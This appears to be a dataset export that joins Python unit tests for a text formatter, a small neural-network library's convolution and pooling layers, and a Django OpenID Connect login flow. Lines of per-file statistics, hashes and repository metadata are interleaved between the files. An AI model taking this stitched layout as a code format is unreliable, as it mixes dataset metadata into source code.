"""Test that internal formatting marks are preserved"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.paragraph(test_str)
self.assertEqual(formatted_str, "\n test \033[1mbold\033[0m str\n")
def test_paragraph_removes_internal_line_breaks(self):
"""Test that inner line breaks are replaced by spaces"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n test broken str\n")
def test_paragraph_preserves_capitalization(self):
"""Test that capitalization is preserved"""
test_str = "tEst brOKen str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n tEst brOKen str\n")
# Test paragraphsub
def test_paragraphsub_ends_with_line_breaks(self):
"""Test that the result ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_paragraphsub_is_indented(self):
"""Test that the result format is properly indented"""
test_str = "test str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " test str\n")
def test_paragraphsub_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.paragraphsub(test_str)
self.assertEqual(formatted_str, "")
def test_paragraphsub_containing_formatting(self):
"""Test that internal formatting marks are preserved"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.paragraphsub(test_str)
self.assertEqual(formatted_str, " test \033[1mbold\033[0m str\n")
def test_paragraphsub_removes_internal_line_breaks(self):
"""Test that inner line breaks are replaced by spaces"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " test broken str\n")
def test_paragraphsub_preserves_capitalization(self):
"""Test that capitalization is preserved"""
test_str = "tEst brOKen str"
formatted_str = PrintFormatter.paragraphsub(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, " tEst brOKen str\n")
| 42.7125
| 100
| 0.680226
| 1,295
| 10,251
| 5.135907
| 0.09112
| 0.076831
| 0.052323
| 0.117727
| 0.862577
| 0.830401
| 0.810404
| 0.805593
| 0.801383
| 0.775823
| 0
| 0.011094
| 0.226222
| 10,251
| 239
| 101
| 42.891213
| 0.827408
| 0.179592
| 0
| 0.651899
| 0
| 0
| 0.089968
| 0
| 0
| 0
| 0
| 0
| 0.259494
| 1
| 0.202532
| false
| 0
| 0.018987
| 0.012658
| 0.246835
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42ef12927a6df133428cabc17c2c88f2390fd1d7
| 15,026
|
py
|
Python
|
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
tests/coverage/test_layers.py
|
salvacarrion/dnpy
|
7685355076dbdbf76a4c06c0004aa65fe2e62603
|
[
"MIT"
] | null | null | null |
import unittest
from dnpy import utils
from dnpy.layers import *
from dnpy.net import Net
from dnpy.optimizers import *
import numpy as np
class TestLayersMethods(unittest.TestCase):
def test_outputs(self):
r1 = utils.get_output(input_size=(4, 4), kernel_size=(3, 3), strides=(1, 1), padding=(0, 0))
self.assertTrue(np.all(r1 == np.array((2, 2))))
r2 = utils.get_output(input_size=(5, 5), kernel_size=(4, 4), strides=(1, 1), padding=(2, 2))
self.assertTrue(np.all(r2 == np.array((6, 6))))
r3 = utils.get_output(input_size=(5, 5), kernel_size=(3, 3), strides=(1, 1), padding=(1, 1))
self.assertTrue(np.all(r3 == np.array((5, 5))))
r4 = utils.get_output(input_size=(5, 5), kernel_size=(3, 3), strides=(1, 1), padding=(2, 2))
self.assertTrue(np.all(r4 == np.array((7, 7))))
r5 = utils.get_output(input_size=(5, 5), kernel_size=(3, 3), strides=(2, 2), padding=(0, 0))
self.assertTrue(np.all(r5 == np.array((2, 2))))
r6 = utils.get_output(input_size=(5, 5), kernel_size=(3, 3), strides=(2, 2), padding=(1, 1))
self.assertTrue(np.all(r6 == np.array((3, 3))))
def test_conv2d_2x2_none_temp1(self):
# Test 1
t1_in_img = np.array([[
[
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 4, 5, 0],
[0, 2, 3, 2, 1, 3, 0],
[0, 4, 4, 0, 4, 3, 0],
[0, 2, 5, 2, 6, 4, 0],
[0, 1, 0, 0, 5, 7, 0],
[0, 0, 0, 0, 0, 0, 0],
]
]])
t1_ref_img = np.array([[
[
[0, 1, 1, 4, 9, 5],
[2, 6, 6, 7, 13, 8],
[6, 13, 9, 7, 11, 6],
[6, 15, 11, 12, 17, 7],
[3, 8, 7, 13, 22, 11],
[1, 1, 0, 5, 12, 7]
]
]])
t1_ref_back = np.array([[
[
[1, 2, 2, 2, 2, 2, 1],
[2, 4, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 4, 2],
[1, 2, 2, 2, 2, 2, 1]
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1), padding="none",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_conv2d_2x2_none_temp2(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5, 0],
[2, 3, 2, 1, 3, 0],
[4, 4, 0, 4, 3, 0],
[2, 5, 2, 6, 4, 0],
[1, 0, 0, 5, 7, 0],
[0, 0, 0, 0, 0, 0],
]
]])
t1_ref_img = np.array([[
[
[6, 6, 7, 13, 8],
[13, 9, 7, 11, 6],
[15, 11, 12, 17, 7],
[8, 7, 13, 22, 11],
[1, 0, 5, 12, 7]
]
]])
t1_ref_back = np.array([[
[
[1, 2, 2, 2, 2, 1],
[2, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 2],
[2, 4, 4, 4, 4, 2],
[1, 2, 2, 2, 2, 1]
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1), padding="none",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_conv2d_2x2_none(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[6, 6, 7, 13],
[13, 9, 7, 11],
[15, 11, 12, 17],
[8, 7, 13, 22]
]
]])
t1_ref_back = np.array([[
[
[1, 2, 2, 2, 1],
[2, 4, 4, 4, 2],
[2, 4, 4, 4, 2],
[2, 4, 4, 4, 2],
[1, 2, 2, 2, 1],
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1), padding="none",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_conv2d_2x2_same(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[6, 6, 7, 13, 8],
[13, 9, 7, 11, 6],
[15, 11, 12, 17, 7],
[8, 7, 13, 22, 11],
[1, 0, 5, 12, 7]
]
]])
t1_ref_back = np.array([[
[
[1, 2, 2, 2, 2],
[2, 4, 4, 4, 4],
[2, 4, 4, 4, 4],
[2, 4, 4, 4, 4],
[2, 4, 4, 4, 4]
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = Conv2D(l0, 1, kernel_size=(2, 2), strides=(1, 1), padding="same",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_conv2d_3x3_same(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_in_img = np.concatenate([t1_in_img, t1_in_img*10, t1_in_img*100], axis=1)
t1_ref_img = np.array([[
[
[6, 8, 11, 15, 13],
[14, 16, 19, 22, 20],
[20, 24, 27, 25, 21],
[16, 18, 26, 31, 29],
[8, 10, 18, 24, 22],
]
]])
t1_ref_img = t1_ref_img + t1_ref_img*10 + t1_ref_img*100
t1_ref_back = np.array([[
[
[4, 6, 6, 6, 4],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[4, 6, 6, 6, 4],
]
]])
t1_ref_back = np.concatenate([t1_ref_back, t1_ref_back, t1_ref_back], axis=1)
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = Conv2D(l0, 1, kernel_size=(3, 3), strides=(1, 1), padding="same",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_depthwiseconv2d_3x3_same(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_in_img = np.concatenate([t1_in_img, t1_in_img*10, t1_in_img*100], axis=1)
t1_ref_img = np.array([[
[
[6, 8, 11, 15, 13],
[14, 16, 19, 22, 20],
[20, 24, 27, 25, 21],
[16, 18, 26, 31, 29],
[8, 10, 18, 24, 22],
]
]])
t1_ref_img = np.concatenate([t1_ref_img, t1_ref_img*10, t1_ref_img*100], axis=1)
t1_ref_back = np.array([[
[
[4, 6, 6, 6, 4],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[4, 6, 6, 6, 4],
]
]])
t1_ref_back = np.concatenate([t1_ref_back, t1_ref_back, t1_ref_back], axis=1)
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = DepthwiseConv2D(l0, kernel_size=(3, 3), strides=(1, 1), padding="same",
kernel_initializer=initializers.Constant(fill_value=1))
l1.initialize()
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_maxpool_2x2_none(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[3, 4],
[5, 6],
]
]])
t1_ref_back = np.array([[
[
[0, 0, 0, 1, 0],
[0, 1, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 0],
[0, 0, 0, 0, 0],
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = MaxPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="none")
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_maxpool_2x2_same(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[3, 4, 5],
[5, 6, 4],
[1, 5, 7],
]
]])
t1_ref_back = np.array([[
[
[0, 0, 0, 1, 1],
[0, 1, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 1, 0, 1, 1],
[1, 0, 0, 1, 1],
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = MaxPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="same")
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_avgpool_2x2_none(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[1.5, 1.75],
[3.75, 3.0],
]
]])
t1_ref_back = np.array([[
[
[0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
[0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
[0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
[0.25000, 0.25000, 0.25000, 0.25000, 0.00000],
[0.00000, 0.00000, 0.00000, 0.00000, 0.00000],
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = AvgPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="none")
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_avgpool_2x2_same(self):
# Test 1
t1_in_img = np.array([[
[
[0, 1, 0, 4, 5],
[2, 3, 2, 1, 3],
[4, 4, 0, 4, 3],
[2, 5, 2, 6, 4],
[1, 0, 0, 5, 7],
]
]])
t1_ref_img = np.array([[
[
[1.5, 1.75, 2.0],
[3.75, 3.0, 1.75],
[0.25, 1.25, 1.75],
]
]])
t1_ref_back = np.array([[
[
[0.25, 0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25, 0.25],
[0.25, 0.25, 0.25, 0.25, 0.25],
]
]])
# Test 1
# Forward
l0 = Input(shape=t1_in_img[0].shape)
l0.output = t1_in_img
l1 = AvgPool2D(l0, pool_size=(2, 2), strides=(2, 2), padding="same")
l1.forward()
self.assertTrue(np.all(t1_ref_img == l1.output))
# Backward
l1.delta = np.ones_like(t1_ref_img)
l1.backward()
self.assertTrue(np.all(t1_ref_back == l0.delta))
def test_softmax(self):
# Test 1
t1_in = np.array([
[0.0303, 0.2418, -1.9007],
[-4.7348, -0.7624, -0.5518],
])
t1_ref = np.array([
[0.42007398, 0.51901399, 0.06091204],
[0.00835603, 0.44380405, 0.54783992],
])
t1_delta = np.array([
[1, 2, 3],
[3, 2, 1],
])
t1_ref_back = np.array([
[-0.26919939, 0.18641007, 0.08278932],
[0.01286397, 0.23942514, -0.25228911],
])
# Test 1
# Forward
l0 = Input(shape=t1_in[0].shape)
l0.output = t1_in
l1 = Softmax(l0, stable=True)
l1.forward()
self.assertTrue(np.allclose(t1_ref, l1.output, atol=1e-4))
# Backward
l1.delta = t1_delta
l1.backward()
self.assertTrue(np.allclose(t1_ref_back, l0.delta, atol=1e-4))
if __name__ == "__main__":
unittest.main()
| 28.458333
| 100
| 0.4039
| 2,106
| 15,026
| 2.734093
| 0.060779
| 0.060785
| 0.046197
| 0.020841
| 0.889545
| 0.871831
| 0.845085
| 0.823724
| 0.813651
| 0.791942
| 0
| 0.188097
| 0.42859
| 15,026
| 527
| 101
| 28.512334
| 0.48253
| 0.022627
| 0
| 0.612827
| 0
| 0
| 0.003278
| 0
| 0
| 0
| 0
| 0
| 0.066508
| 1
| 0.028504
| false
| 0
| 0.014252
| 0
| 0.045131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
28150b7ca7848435a3cc7bdf630775ab7064c616
| 14,437
|
py
|
Python
|
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
tests/integration/test_views.py
|
urosn74/django-oidc-rp
|
a5028e76fadaecc0aeac96b1d0bc81db8366d221
|
[
"MIT"
] | null | null | null |
import unittest.mock
from urllib.parse import parse_qs, urlparse
import pytest
from django.contrib.auth.models import User
from django.test import override_settings
from django.urls import reverse
@pytest.mark.django_db
class TestOIDCAuthRequestView:
def test_can_redirect_the_user_to_the_authorization_server_to_be_authenticated(self, client):
url = reverse('oidc_auth_request')
response = client.get(url, follow=False)
assert response.status_code == 302
assert response.url.startswith('http://example.com/a/authorize')
parsed_parameters = parse_qs(urlparse(response.url).query)
assert parsed_parameters['response_type'] == ['code', ]
assert parsed_parameters['scope'] == ['openid email', ]
assert parsed_parameters['client_id'] == ['DUMMY_CLIENT_ID', ]
assert parsed_parameters['redirect_uri'] == ['http://testserver/oidc/auth/cb/', ]
assert parsed_parameters['state']
assert parsed_parameters['nonce']
@unittest.mock.patch('oidc_rp.conf.settings.USE_NONCE', False)
def test_do_not_embed_a_nonce_in_the_request_parameters_if_the_related_setting_is_disabled(
self, client):
url = reverse('oidc_auth_request')
response = client.get(url, follow=False)
assert response.status_code == 302
parsed_parameters = parse_qs(urlparse(response.url).query)
assert parsed_parameters['response_type'] == ['code', ]
assert parsed_parameters['scope'] == ['openid email', ]
assert parsed_parameters['client_id'] == ['DUMMY_CLIENT_ID', ]
assert parsed_parameters['redirect_uri'] == ['http://testserver/oidc/auth/cb/', ]
assert parsed_parameters['state']
assert 'nonce' not in parsed_parameters
def test_saves_the_authorization_state_value_in_the_user_session(self, client):
url = reverse('oidc_auth_request')
response = client.get(url, follow=False)
assert response.status_code == 302
parsed_parameters = parse_qs(urlparse(response.url).query)
assert client.session['oidc_auth_state'] == parsed_parameters['state'][0]
def test_saves_the_nonce_value_in_the_user_session_if_applicable(self, client):
url = reverse('oidc_auth_request')
response = client.get(url, follow=False)
assert response.status_code == 302
parsed_parameters = parse_qs(urlparse(response.url).query)
assert client.session['oidc_auth_nonce'] == parsed_parameters['nonce'][0]
@pytest.mark.django_db
class TestOIDCAuthCallbackView:
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
def test_can_properly_authenticate_users_and_redirect_them_to_a_success_url(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/success'
assert mocked_authenticate.call_count == 1
assert mocked_login.call_count == 1
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
@unittest.mock.patch('oidc_rp.conf.settings.USE_NONCE', False)
def test_can_properly_authenticate_users_and_redirect_them_to_a_success_url_without_nonce(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/success'
assert mocked_authenticate.call_count == 1
assert mocked_login.call_count == 1
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
def test_can_properly_authenticate_users_and_redirect_them_to_a_custom_success_url(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session['oidc_auth_next_url'] = '/profile'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/profile'
assert mocked_authenticate.call_count == 1
assert mocked_login.call_count == 1
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_can_redirect_users_to_a_failure_page_in_case_of_missing_nonce(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/fail'
assert not mocked_authenticate.call_count
assert not mocked_login.call_count
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_can_redirect_users_to_a_failure_page_in_case_of_missing_code_parameter(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/fail'
assert not mocked_authenticate.call_count
assert not mocked_login.call_count
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_can_redirect_users_to_a_failure_page_in_case_of_missing_state_parameter(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode'})
assert response.status_code == 302
assert response.url == '/fail'
assert not mocked_authenticate.call_count
assert not mocked_login.call_count
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_can_redirect_the_to_a_failure_page_if_he_is_not_active(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
user.is_active = False
user.save()
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/fail'
assert mocked_authenticate.call_count == 1
assert not mocked_login.call_count
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_raises_if_the_state_has_been_tampered_with(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'validstate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 400 # suspicious operation
assert not mocked_authenticate.call_count
assert not mocked_login.call_count
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
def test_removes_nonce_from_user_session_upon_user_authentication(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'code': 'dummycode', 'state': 'dummystate'})
assert response.status_code == 302
assert response.url == '/success'
assert mocked_authenticate.call_count == 1
assert mocked_login.call_count == 1
assert 'oidc_auth_state' in client.session
assert 'oidc_auth_nonce' not in client.session
@unittest.mock.patch('django.contrib.auth.authenticate')
@unittest.mock.patch('django.contrib.auth.login')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_REDIRECT_URI', '/success')
def test_stores_the_session_state_if_applicable(
self, mocked_login, mocked_authenticate, client):
user = User.objects.create_user('foo')
mocked_authenticate.return_value = user
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(
url, {'code': 'dummycode', 'state': 'dummystate', 'session_state': 'thisisatest', })
assert response.status_code == 302
assert response.url == '/success'
assert mocked_authenticate.call_count == 1
assert mocked_login.call_count == 1
assert client.session['oidc_auth_session_state'] == 'thisisatest'
@unittest.mock.patch('django.contrib.auth.logout')
@unittest.mock.patch('oidc_rp.conf.settings.AUTHENTICATION_FAILURE_REDIRECT_URI', '/fail')
def test_logout_the_current_user_if_the_authentication_failed_on_the_op(
self, mocked_logout, client):
session = client.session
session['oidc_auth_state'] = 'dummystate'
session['oidc_auth_nonce'] = 'dummynonce'
session.save()
url = reverse('oidc_auth_callback')
response = client.get(url, {'error': 'login_required', })
assert response.status_code == 302
assert response.url == '/fail'
assert mocked_logout.call_count == 1
@pytest.mark.django_db
class TestOIDCEndSessionView:
@unittest.mock.patch('django.contrib.auth.logout')
@unittest.mock.patch('oidc_rp.conf.settings.PROVIDER_END_SESSION_ENDPOINT',
'http://example.com/a/end-session')
def test_can_log_out_a_user_from_the_application_and_the_authorization_server(
self, mocked_logout, client):
User.objects.create_user('foo', password='insecure')
client.login(username='foo', password='insecure')
session = client.session
session['oidc_auth_id_token'] = 'idtoken'
session.save()
url = reverse('oidc_end_session')
response = client.get(url, follow=False)
assert response.status_code == 302
assert response.url.startswith('http://example.com/a/end-session')
parsed_parameters = parse_qs(urlparse(response.url).query)
assert parsed_parameters['post_logout_redirect_uri'] == ['http://testserver/', ]
assert parsed_parameters['id_token_hint'] == ['idtoken', ]
assert mocked_logout.call_count == 1
@unittest.mock.patch('django.contrib.auth.logout')
@override_settings(LOGOUT_REDIRECT_URL='/logout')
def test_can_log_out_a_user_from_the_application_without_end_session_endpoint(
self, mocked_logout, client):
User.objects.create_user('foo', password='insecure')
client.login(username='foo', password='insecure')
url = reverse('oidc_end_session')
response = client.get(url, follow=False)
assert response.status_code == 302
assert response.url == '/logout'
assert mocked_logout.call_count == 1
@unittest.mock.patch('django.contrib.auth.logout')
@override_settings(LOGOUT_REDIRECT_URL='/logout')
def test_silently_works_for_anonymous_users(self, mocked_logout, client):
url = reverse('oidc_end_session')
response = client.get(url, follow=False)
assert response.status_code == 302
assert response.url == '/logout'
assert not mocked_logout.call_count
| 48.773649
| 97
| 0.692872
| 1,706
| 14,437
| 5.566237
| 0.091442
| 0.037068
| 0.066238
| 0.05813
| 0.871525
| 0.853939
| 0.844882
| 0.842565
| 0.842565
| 0.842565
| 0
| 0.00601
| 0.193253
| 14,437
| 295
| 98
| 48.938983
| 0.809307
| 0.001385
| 0
| 0.802198
| 0
| 0
| 0.221713
| 0.095179
| 0
| 0
| 0
| 0
| 0.274725
| 1
| 0.065934
| false
| 0.014652
| 0.021978
| 0
| 0.098901
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2827e00d1b2cfaecf1d4d73d08fe73157f13de3e
| 153,233
|
py
|
Python
|
scratch/espim_example.py
|
compmech/particles
|
